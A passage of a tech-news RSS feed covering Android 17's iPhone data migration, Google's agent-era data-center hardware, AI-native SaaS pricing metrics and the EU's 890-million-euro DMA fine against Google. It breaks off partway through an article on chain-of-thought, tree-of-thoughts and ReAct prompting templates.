<p>Direkt in Android 17 (<a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">alles zum großen System-Update lesen Sie hier nach</a>) verbaut Google nämlich eine neue Migrationsfunktion, mit der es möglich ist, noch mehr Datentypen drahtlos von einem iPhone auf ein Android-Gerät zu übertragen. Sie benötigen dafür keine separate App (<a href="https://www.pcwelt.de/article/3124530/dateien-android-apple-windows-austauschen-pairdrop.html" target="_blank" rel="noreferrer noopener">wie etwa Pairdrop, die wir hier vorstellen</a>) oder müssen sonstige Umwege gehen.</p>



<p>Das soll natürlich vor allem den Wechsel auf ein brandneues Android-Gerät erleichtern, wie sich Google insgeheim erhofft. Schließlich ist das einer der Anwendungsfälle, bei denen es besonders umständlich ist, sämtliche Daten von einem Gerät aufs nächste zu übertragen.</p>



<p>Google verspricht, dass Sie mit der verbesserten Methode alles herüberziehen können, egal ob Fotos, Videos, Kontakte, Nachrichten oder Kalender. Neuerdings unterstützt werden auch Google-Konten, Passwörter, WLAN-Zugangsdaten und sogar Ihre <a href="https://www.pcwelt.de/article/1355091/esim-erklaert-vorteile-nachteile-ueberblick.html" target="_blank" rel="noreferrer noopener">eSIM</a>.</p>



<p>Das dazugehörige Update soll bereits jetzt auf “ausgewählte” Google-Pixel-Geräte ausgerollt werden. Gemeint ist vermutlich Android 17, das am 19. Juni <a href="https://www.pcwelt.de/article/3167761/android-17-endlich-da-so-bekommen-sie-jetzt-das-update.html" target="_blank" rel="noreferrer noopener">offiziell erschienen</a> ist. Welche Geräte noch Android 17 erhalten werden, <a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">lesen Sie hier nach</a>.</p>



<p>Neben der neuen Dateiübertragung wurden beim Unpacked-Event vor allem neue Samsung-Geräte vorgestellt. Unsere ersten Eindrücke zu den neuen Galaxy-Geräten lesen Sie hier:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3196777/galaxy-z-fold-8-hands-on-preis-release-specs.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 8: Das faltbare Smartphone, von dem ich nicht wusste, dass ich es brauche</a></li>



<li><a href="https://www.pcwelt.de/article/3196774/samsung-galaxy-watch-9-praxistest.html" target="_blank" rel="noreferrer noopener">Galaxy Watch 9 im Praxistest: Zwei Dinge, die mir gefallen, und eines, das ich nicht mag</a></li>



<li><a href="https://www.pcwelt.de/article/3196896/samsung-galaxy-z-fold-8-ultra-hands-on-preis-release.html" target="_blank" rel="noreferrer noopener">Das Galaxy Z Fold 8 Ultra ist ein Meisterwerk, das Sie lieber nicht kaufen sollten</a></li>
</ul>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/3189161/android-17-installieren-alte-smartphones.html" target="_blank" rel="noreferrer noopener">Wie Sie Android 17 auf nicht unterstützten Geräten installieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google transforms its data center architecture for agent era]]></title>
<description><![CDATA[Google’s data center team is racing to turn its infrastructure into a well-oiled machine for AI and the onslaught of agents. At this year’s Google I/O, CEO Sundar Pichai shared startling numbers: Google’s data centers processed about 3.2 quadrillion tokens a month, roughly seven times more than t...]]></description>
<link>https://tsecurity.de/de/3689013/it-security-nachrichten/google-transforms-its-data-center-architecture-for-agent-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689013/it-security-nachrichten/google-transforms-its-data-center-architecture-for-agent-era/</guid>
<pubDate>Thu, 23 Jul 2026 14:23:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google’s data center team is racing to turn its infrastructure into a well-oiled machine for AI and the <a href="https://www.networkworld.com/article/4175890/cisco-ai-traffic-is-radically-reshaping-wans.html">onslaught of agents</a>. At this year’s Google I/O, CEO Sundar Pichai shared startling numbers: Google’s data centers processed about 3.2 quadrillion tokens a month, roughly seven times more than the 480 trillion processed in May 2025.</p>



<p class="wp-block-paragraph">“Multiple agents work together, and now you’ve got millions, billions of users around the world potentially spinning off agents to help them do things,” said <a href="https://www.linkedin.com/in/marklohmeyer/">Mark Lohmeyer</a>, vice president and general manager for AI and computing infrastructure at Google.</p>



<p class="wp-block-paragraph">Google’s new data-center blueprint includes updated hardware, software, and orchestration layers to keep always-running agents operational.</p>



<p class="wp-block-paragraph">In the LLM era, users sent prompts and received responses, and Google’s infrastructure was designed for latency and throughput. But <a href="https://www.networkworld.com/article/4057121/network-and-cloud-implications-of-agentic-ai.html">agents could increase inference transactions</a> by up to 100 times non-agentic workloads, Lohmeyer said. Google’s redesigned AI data-center stack has the elasticity for agents to be widely distributed, run for long periods, and make decisions independently.</p>



<p class="wp-block-paragraph">“We’re delivering new platforms every year, each one optimized for what we think the world is going to need for the age of agents going forward,” Lohmeyer said.</p>



<p class="wp-block-paragraph">Efficient data flow is key so agents can act, reason, and decide faster. </p>



<p class="wp-block-paragraph">Google adjusted the <a href="https://www.infoworld.com/article/2255921/gke-tutorial-get-started-with-google-kubernetes-engine.html">Google Kubernetes Engine</a> into an agent-native environment, where agents could be quickly spun up in sandboxes and containers. “From an infrastructure perspective, you need to spin up a bunch of TPUs or GPUs very rapidly. Then you need to be able to run them and spin them back down,” Lohmeyer said.</p>



<p class="wp-block-paragraph">Google also made drastic improvements to its silicon to support its middleware changes. It recently <a href="https://www.networkworld.com/article/4162004/google-bets-on-workload-specific-tpus-with-8t-and-8i-launch.html">introduced new AI chips</a>, with the TPU-8t for training, and TPU-8i for inference. The 8t chip has three times more computing power than the previous-generation Ironwood chip. The 8i chip has 384 megabytes of SRAM and 288GB of HBM3e memory, which is 50% more than the previous-generation chip.</p>



<p class="wp-block-paragraph">The platform is optimized for KV cache (key-value cache), which stores important contextual information needed by agents to make decisions, which reduces the round trips to other memory and storage systems. “Being able to store more of the KV cache directly on the chip allows you to respond much more rapidly and cost-effectively,” Lohmeyer said.</p>



<p class="wp-block-paragraph">A new CPU called <a href="https://www.networkworld.com/article/4086182/google-cloud-aims-for-more-cost-effective-arm-computing-with-axion-n4a.html">Axion N4A</a> is more power efficient at agentic workloads such as orchestration and tool calling, Lohmeyer said.</p>



<p class="wp-block-paragraph">Google also made many network and storage improvements to cut training and inference time. A new technology called <a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive">TPUDirect</a> can move data from storage directly into the memory of the TPU quickly by bypassing any orchestration overhead, Lohmeyer said.</p>



<p class="wp-block-paragraph"><a href="https://cloud.google.com/blog/products/networking/introducing-virgo-megascale-data-center-fabric">A networking technology called Virgo</a> can coordinate 1 million TPUs across a widely distributed network. It can also link up GPUs such as Nvidia’s latest CPU-GPU package called Vera Rubin. “In the case of Vera Rubin, we’ll be able to connect up to 960,000 GPUs leveraging Virgo,” Lohmeyer said.</p>



<p class="wp-block-paragraph">A new technology called <a href="https://docs.cloud.google.com/ai-hypercomputer/docs/workloads/pathways-on-cloud/pathways-intro">Pathways</a> is a distributed training framework that efficiently scales machine learning across millions of TPUs and GPUs. Pathways solves bottleneck issues typically associated with JAX, and both help coordinate across wide networks.</p>



<p class="wp-block-paragraph">“The software to orchestrate these large-scale distributed training jobs is also just as important as the hardware that it runs on top of,” Lohmeyer said.</p>



<h2 class="wp-block-heading">Weighing Google’s AI data-center stack</h2>



<p class="wp-block-paragraph">Google is the only provider with its own data centers, software, hardware and models, said <a href="https://www.linkedin.com/in/jckgld/">Jack Gold</a>, principal analyst at J. Gold Associates. Google can optimize each on a regular cadence, which “many data centers can’t easily afford given the high cost of new chips,” Gold said.</p>



<p class="wp-block-paragraph">Google’s stack may not be best for every data center need compared to Nvidia’s general-purpose GPUs, CPUs, and networking. AWS and Microsoft are also creating their chips.</p>



<p class="wp-block-paragraph">“There is no real risk of Nvidia being replaced by Google in a big way. But with an ever-expanding market, there is plenty of room for all players,” Gold said.</p>



<p class="wp-block-paragraph">But <a href="https://www.linkedin.com/in/logan-wolfe/">Logan Wolfe</a>, partner at Kyndryl’s global AI strategy and sovereign transformation, advised enterprises to adopt a multi-cloud strategy to reduce risk from system failures, however superior an infrastructure may be. “I think that kind of hybrid and liquid infrastructure, we’re definitely getting there,” Wolfe said.</p>



<p class="wp-block-paragraph">The cost per token varies depending on the provider of inference, whether that’s Microsoft, Google, OpenAI or Anthropic. That will matter as AI moves from experimentation to a powerful tool that drives business changes.</p>



<p class="wp-block-paragraph">“Ultimately it really comes down to how much money are we spending on AI to move a certain business outcome,” Wolfe said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Thu, 23 Jul 2026 14:05:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google muss innerhalb von 60 Tagen seine Suche und den Play Store ändern: Der Grund]]></title>
<description><![CDATA[Die EU-Kommission hat soeben entschieden, eine gewaltige Strafe gegen Google zu verhängen. Das Unternehmen muss Strafzahlungen in Höhe von insgesamt 890 Millionen Euro leisten. 460 Millionen Euro davon betreffen speziell die Google-Suche, die gegen den Digital Markets Act (DMA) verstoßen haben so...]]></description>
<link>https://tsecurity.de/de/3688922/it-nachrichten/google-muss-innerhalb-von-60-tagen-seine-suche-und-den-play-store-aendern-der-grund/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688922/it-nachrichten/google-muss-innerhalb-von-60-tagen-seine-suche-und-den-play-store-aendern-der-grund/</guid>
<pubDate>Thu, 23 Jul 2026 13:50:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die EU-Kommission hat soeben <a href="https://digital-markets-act.ec.europa.eu/commission-fines-google-eur890-million-breaches-digital-markets-act-2026-07-23_en?utm_source=chatgpt.com" target="_blank" rel="noreferrer noopener">entschieden</a>, eine gewaltige Strafe gegen Google zu verhängen. Das Unternehmen muss Strafzahlungen in Höhe von insgesamt 890 Millionen Euro leisten. 460 Millionen Euro davon betreffen speziell die Google-Suche, die gegen den Digital Markets Act (DMA) verstoßen haben soll.</p>



<p>Konkret wird Google vorgeworfen, eigene Angebote für Shopping, Reisen/Hotels, Verkehr und Sport bevorzugt dargestellt zu haben. Google habe aufgrund der besonderen Stellung am Markt die Macht, eigene Dienste prominenter darzustellen, also höher in den Suchergebnissen und mit besonderen Anzeigen.</p>



<p>Vergleichbare (oder bessere) Angebote sollen dadurch gezielt benachteiligt werden, so die Europäische Kommission. Weltweit gebe es keinen vergleichbaren Anbieter für gezielte Web-Suchen, und das mache sich Google zunutze.</p>



<p>Der zweite Teil der Strafzahlung betrifft den Google Play Store. App-Entwickler konnten demnach ihre Nutzer nicht frei auf alternative und häufig günstigere Kaufmöglichkeiten hinweisen. Außerdem erschwere Google den Abschluss von Käufen über Webseiten oder konkurrierende App-Stores.</p>



<p>Auch die Gebührenhöhe und die Dauer bestimmter Zahlungen an Google wurden von der EU kritisiert und gingen laut dieser über das Erlaubte hinaus.</p>



<h2 class="wp-block-heading">Die Folgen</h2>



<p>Google muss jetzt, sofern sie das Urteil anerkennen, eine gewaltige Strafe von 890 Millionen Euro zahlen. Da dessen Mutterkonzern Alphabet aber einen geschätzten jährlichen Umsatz von circa 400 Milliarden US-Dollar <a href="https://companiesmarketcap.com/de/alphabet-google/umsatz/" target="_blank" rel="noreferrer noopener">erwirtschaftet</a>, dürfte das kein allzu großes Problem sein.</p>



<p>Viel schwerwiegender ist, dass der Konzern nun 60 Tage Zeit hat, um seine Google-Suche und den Google Play Store DMA-konform umzugestalten. Bis Ende der Frist muss Google konkrete Maßnahmen vorlegen, die der EU-Kommission darstellen, wie das passieren soll. Bei unzureichender Umsetzung drohen weitere Sanktionen wie regelmäßige Strafzahlungen oder rechtliche Schritte.</p>



<p>Google selbst weist die Vorwürfe zurück und argumentiert, die geforderten Änderungen könnten nützliche Suchfunktionen und den Schutz der Nutzer beeinträchtigen. Doch laut EU sollen Verbraucher durch diese Entscheidung fairere Suchergebnisse und mehr Möglichkeiten, Apps beziehungsweise digitale Inhalte außerhalb des Play Stores günstiger zu kaufen, erhalten.</p>



<p>Erst Anfang des Monats erklärte der Europäische Gerichtshof (EuGH) eine weitere Rekord-Strafzahlung gegen Google für gültig. In diesem Fall muss Google sogar 4,1 Milliarden Euro zahlen. </p>



<p><a href="https://www.pcwelt.de/article/3143903/google-suche-bekommt-groesstes-update-seit-25-jahren.html" target="_blank" rel="noreferrer noopener">Google-Suche bekommt größtes Update seit 25 Jahren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[890 Millionen Euro: Brüssel bestraft Google gleich doppelt]]></title>
<description><![CDATA[890 Millionen Euro: Brüssel bestraft Google gleich doppelt

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Do., 23.07.2026 - 13:30


            Die Europäische Kommission hat Google wegen gleich zwei Verstöß...]]></description>
<link>https://tsecurity.de/de/3688912/server/890-millionen-euro-bruessel-bestraft-google-gleich-doppelt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688912/server/890-millionen-euro-bruessel-bestraft-google-gleich-doppelt/</guid>
<pubDate>Thu, 23 Jul 2026 13:47:50 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">890 Millionen Euro: Brüssel bestraft Google gleich doppelt</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/google-eu-kommission-strafe-890-millionen-euro"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/161917153_m_0.jpg?itok=IOO2hFZs" width="480" height="319" alt="Alt-Text: Google-Startseite auf einem Bildschirm, das Google-Logo wird durch eine Lupe vergrößert dargestellt." title="Die EU-Kommission nimmt Googles Suchmaschine genau unter die Lupe – und verhängt wegen Verstößen gegen den Digital Markets Act eine Geldbuße von 890 Millionen Euro. (Quelle: simpson33 - 123RF)" typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-07-23T13:30:00+02:00" title="Donnerstag, Juli 23, 2026 - 13:30" class="datetime">Do., 23.07.2026 - 13:30</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Die Europäische Kommission hat Google wegen gleich zwei Verstößen gegen das Gesetz über digitale Märkte zu Geldbußen in Höhe von insgesamt 890 Millionen Euro verurteilt. Der Konzern soll eigene Dienste in der Suche bevorzugt und App-Entwickler bei alternativen Bezahlwegen ausgebremst haben.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/news" hreflang="en">News</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/google-eu-kommission-strafe-890-millionen-euro" rel="tag" title="890 Millionen Euro: Brüssel bestraft Google gleich doppelt" hreflang="en">Weiterlesen<span class="visually-hidden"> über 890 Millionen Euro: Brüssel bestraft Google gleich doppelt</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop asking AI nicely: Here’s how to get work-ready results every time]]></title>
<description><![CDATA[Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation fo...]]></description>
<link>https://tsecurity.de/de/3688796/it-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688796/it-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</guid>
<pubDate>Thu, 23 Jul 2026 13:07:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation for reliable, measurable outcomes. I want to share the techniques that consistently delivered the biggest gains in my projects, complete with real before-and-after examples, copy-paste templates, lessons from failures and guidance on when to evolve beyond prompting to agentic systems.</p>



<h2 class="wp-block-heading">Why advanced prompting still matters in enterprise settings</h2>



<p class="wp-block-paragraph">Sophisticated prompting remains essential for control, reliability and compliance. If you “ask nicely” and hope for the best, you need deterministic behavior, auditable reasoning and minimal risk of hallucination. Here’s what worked for me.</p>



<h3 class="wp-block-heading">1. Chain-of-Thought (CoT) and its variants: Unlocking step-by-step reasoning</h3>



<p class="wp-block-paragraph"><strong>The problem:</strong> Models would jump to conclusions on complex analysis tasks, especially involving data interpretation or multi-step logic.</p>



<p class="wp-block-paragraph"><strong>What I did:</strong> I started explicitly instructing the model to “think step by step” and show its reasoning.</p>



<p class="wp-block-paragraph"><strong>Before (basic prompt): </strong>“Analyze last quarter’s sales data and recommend three actions.”</p>



<p class="wp-block-paragraph"><strong>After (CoT prompt):</strong></p>



<p class="wp-block-paragraph">“You’re a senior business analyst. Analyze the following sales data step by step: [data]. First, identify the key trends. Second, calculate the rates and anomalies. Third, link findings to business context. Finally, recommend the three prioritized actions with expected impact. Explain your reasoning at each step.”  </p>



<p class="wp-block-paragraph"><strong>Results:</strong> Accuracy and depth improved dramatically.</p>



<p class="wp-block-paragraph"><strong>Variants that worked well:</strong> Self-consistency. I ran the same CoT prompt multiple times and took the majority consensus. This reduced variability significantly.</p>



<p class="wp-block-paragraph"><strong>Template you can use:</strong></p>



<pre class="wp-block-code"><code>You are [expert role]. Solve this problem by thinking step by step.

[Task or question]

For each step:

1. State your observation or calculation.

2. Explain the implication.

3. Proceed only when confident.

Final answer in this format: [structured output]</code></pre>



<h3 class="wp-block-heading">2. Tree-of-Thoughts (ToT): Exploring multiple reasoning paths</h3>



<p class="wp-block-paragraph">For truly complex decisions such as resource allocation or risk assessment, linear CoT isn’t enough. Tree-of-Thoughts lets the model generate and evaluate multiple branches.</p>



<p class="wp-block-paragraph"><strong>Example:</strong> I was helping a client evaluate three potential vendor platforms for an AI deployment. A standard prompt gave a superficial comparison. With ToT</p>



<p class="wp-block-paragraph"><strong>Prompt Snippet:</strong></p>



<pre class="wp-block-code"><code>Explore three different reasoning paths for selecting the best vendor platform:

Path 1: Focus on cost and scalability.

Path 2: Focus on security, compliance and integration.

Path 3: Focus on innovation and long-term roadmap.

For each path, evaluate pros/cons against our requirements [list].

Then, compare the paths and recommend the strongest overall option with justification.</code></pre>



<p class="wp-block-paragraph"><strong>Outcome:</strong> The model surfaced nuanced trade-offs (e.g., one vendor had superior security, but higher integration cost).</p>



<p class="wp-block-paragraph"><strong>When to use:</strong> Strategic planning, troubleshooting or scenarios with high uncertainty and multiple viable approaches.</p>



<h3 class="wp-block-heading">3. ReAct (Reason+ Act) and prompt chaining: Moving toward agentic behavior</h3>



<p class="wp-block-paragraph">One of the biggest leaps I have noticed comes from combining reasoning with tool use and chaining prompts.</p>



<p class="wp-block-paragraph"><strong>ReAct example</strong>: (used in data analytics workflow)</p>



<pre class="wp-block-code"><code>You are an AI analyst with access to tools. For the query below:

1. Reason about what information you need.

2. Choose the appropriate tool or action.

3. Observe the result.

4. Repeat until you can answer confidently.

Query: [user request]</code></pre>



<p class="wp-block-paragraph">In practice, I chained this with retrieval tools. One automated quarterly compliance reporting; the system reasoned about required data, pulled relevant records, validated them, and generated the reports.</p>



